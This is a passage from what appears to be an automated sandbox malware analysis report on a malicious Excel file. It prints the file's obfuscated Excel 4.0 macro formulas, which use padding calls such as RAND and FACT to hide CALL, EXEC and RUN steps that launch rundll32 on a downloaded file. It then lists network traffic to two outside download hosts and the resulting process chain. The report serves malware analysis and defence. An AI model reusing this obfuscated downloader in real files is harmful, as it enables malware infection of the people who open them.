=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                          "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                          "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 12, 2021 15:39:58.013303995 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:39:58.171808958 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:39:58.171921015 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:39:58.182147980 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:39:58.342793941 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:39:58.358908892 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:39:58.358962059 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:39:58.359008074 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:39:58.359097004 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:39:58.361450911 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:39:58.402626038 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:39:58.570821047 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:39:58.571110964 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:40:00.132225037 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:40:00.331870079 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:40:00.544558048 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:40:00.544827938 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:40:00.544934034 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:40:00.545075893 CEST49167443192.168.2.22192.185.39.58
                                          May 12, 2021 15:40:00.622363091 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:00.703530073 CEST44349167192.185.39.58192.168.2.22
                                          May 12, 2021 15:40:00.785681963 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:00.785991907 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:00.786700964 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:00.949567080 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:00.997925997 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:00.997970104 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:00.998018026 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:00.998156071 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:01.048815012 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:01.211740971 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:01.221358061 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:01.221483946 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:01.260261059 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:01.464107990 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:01.901674032 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:01.901885986 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:01.901998997 CEST44349170192.185.32.232192.168.2.22
                                          May 12, 2021 15:40:01.902075052 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:01.902817011 CEST49170443192.168.2.22192.185.32.232
                                          May 12, 2021 15:40:02.066484928 CEST44349170192.185.32.232192.168.2.22

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 12, 2021 15:39:57.932200909 CEST5219753192.168.2.228.8.8.8
                                          May 12, 2021 15:39:57.989470005 CEST53521978.8.8.8192.168.2.22
                                          May 12, 2021 15:39:58.918446064 CEST5309953192.168.2.228.8.8.8
                                          May 12, 2021 15:39:58.967097044 CEST53530998.8.8.8192.168.2.22
                                          May 12, 2021 15:39:58.976571083 CEST5283853192.168.2.228.8.8.8
                                          May 12, 2021 15:39:59.027966022 CEST53528388.8.8.8192.168.2.22
                                          May 12, 2021 15:39:59.573966980 CEST6120053192.168.2.228.8.8.8
                                          May 12, 2021 15:39:59.622828007 CEST53612008.8.8.8192.168.2.22
                                          May 12, 2021 15:39:59.629901886 CEST4954853192.168.2.228.8.8.8
                                          May 12, 2021 15:39:59.683872938 CEST53495488.8.8.8192.168.2.22
                                          May 12, 2021 15:40:00.560477018 CEST5562753192.168.2.228.8.8.8
                                          May 12, 2021 15:40:00.620583057 CEST53556278.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          May 12, 2021 15:39:57.932200909 CEST192.168.2.228.8.8.80xa4ceStandard query (0)signifysystem.comA (IP address)IN (0x0001)
                                          May 12, 2021 15:40:00.560477018 CEST192.168.2.228.8.8.80xd063Standard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          May 12, 2021 15:39:57.989470005 CEST8.8.8.8192.168.2.220xa4ceNo error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                          May 12, 2021 15:40:00.620583057 CEST8.8.8.8192.168.2.220xd063No error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                          HTTPS Packets

                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                          May 12, 2021 15:39:58.359008074 CEST192.185.39.58443192.168.2.2249167CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                          May 12, 2021 15:40:00.998018026 CEST192.185.32.232443192.168.2.2249170CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: EXCEL.EXE PID: 2508 Parent PID: 584

                                          General

                                          Start time:15:39:42
                                          Start date:12/05/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                          Imagebase:0x13f860000
                                          File size:27641504 bytes
                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: rundll32.exe PID: 2620 Parent PID: 2508

                                          General

                                          Start time:15:39:49
                                          Start date:12/05/2021
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                          Imagebase:0xffc50000
                                          File size:45568 bytes
                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: rundll32.exe PID: 2564 Parent PID: 2508

                                          General

                                          Start time:15:39:50
                                          Start date:12/05/2021
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                          Imagebase:0xffc50000
                                          File size:45568 bytes
                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >